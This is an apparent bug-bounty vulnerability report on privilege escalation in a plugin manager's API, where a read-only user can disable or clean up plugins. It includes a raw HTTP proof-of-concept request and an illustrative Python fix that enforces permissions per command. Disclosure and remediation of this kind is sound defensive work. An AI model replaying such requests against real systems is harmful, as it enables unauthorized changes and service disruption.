
Privilege escalation allows user with read access only to edit admin portal and take actions

2022-08-23 12:02:44
ahmedelsadat198
www.huntr.dev
9

EPSS: 0.001 (Low), percentile 41.2%

Overview of the Vulnerability

Authentication and session management controls can be bypassed in a variety of ways, including calling an internal post-authentication page directly, modifying the given URL parameters, manipulating the form, or counterfeiting sessions. The authentication method for this application can be bypassed by an attacker, which enables them to access a privileged user's account and functionality, giving them access to more resources or functionality within the application. This could include viewing or editing sensitive customer data, and viewing or editing other users' permissions.

Business Impact

The impact of privilege escalation through broken authentication controls varies in severity depending on the degree of access to resources or functionality the attacker is able to gain. An attacker able to access, delete, or modify data from within the application could cause reputational damage to the business through the loss of customers' trust. It can also result in indirect financial costs to the business through fines from regulatory bodies if sensitive data is accessed. The severity of the impact on the business depends on the sensitivity of the data stored in, and transmitted by, the application.

Summary

A lower-privileged user (a member of the Read-only Access group) is not allowed to edit or take actions in the plugin management section; only admin users (users with the corresponding privileges) are. However, by sending the API request directly, a read-only user can change the admin environment by enabling, disabling or cleaning up plugins without holding those privileges.

As stated on the website:

    Read-only Access
    Group to gain read-only access
    Plugin Manager: List plugins (ONLY)

Proof of Concept

Send the following request through the Burp proxy, using the session cookie of a read-only user.

Note: the command can be changed to enable, disable or cleanup, and this applies to all plugins (that is why Availability is rated High in the CVSS score).

POST /api/plugin/pluginmanager HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 43
Origin: http://localhost:5000
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cookie: session_P5000= {{ Read-only access user cookies }}

{"plugin":"corewizard","command":"disable"}
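As an added illustration (not code from the report or from the affected project), the server-side check that closes this gap: a hypothetical plugin-manager handler that only verifies login, beside one that resolves the permission each command requires and checks it on every request. The group names, permission strings, session shape and handler signatures are assumptions; the request body is the one from the proof of concept.

```python
import json

# Hypothetical permission model mirroring the report: the Read-only Access
# group may only list plugins; enable/disable/cleanup are admin operations.
GROUP_PERMS = {
    "read-only": {"plugin:list"},
    "admin": {"plugin:list", "plugin:manage"},
}

# Each plugin-manager command maps to the permission it requires; anything
# not in this table is rejected outright (deny by default).
COMMAND_PERMS = {
    "list": "plugin:list",
    "enable": "plugin:manage",
    "disable": "plugin:manage",
    "cleanup": "plugin:manage",
}

def vulnerable_handler(session, body):
    # Before: only the UI hides the buttons; the API checks login, not rights.
    if session is None:
        return 401, {"error": "login required"}
    req = json.loads(body)
    return 200, {"plugin": req["plugin"], "command": req["command"], "applied": True}

def hardened_handler(session, body):
    # After: derive the permission the command needs and check it against the
    # caller's groups on every request, independent of what the UI exposes.
    if session is None:
        return 401, {"error": "login required"}
    try:
        req = json.loads(body)
        plugin, command = req["plugin"], req["command"]
    except (ValueError, KeyError, TypeError):
        return 400, {"error": "malformed request"}
    needed = COMMAND_PERMS.get(command)
    if needed is None:
        return 400, {"error": "unknown command"}
    granted = set().union(*(GROUP_PERMS.get(g, set()) for g in session["groups"]))
    if needed not in granted:
        return 403, {"error": "insufficient permissions", "needs": needed}
    return 200, {"plugin": plugin, "command": command, "applied": True}

# Constructed sessions and the exact body from the report's request.
READONLY = {"user": "viewer", "groups": {"read-only"}}
ADMIN = {"user": "root", "groups": {"admin"}}
BODY = '{"plugin":"corewizard","command":"disable"}'
```

The same request that the vulnerable handler applies for a read-only session is refused with 403 by the hardened one, while listing still works for that group and unknown commands are rejected for everyone.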
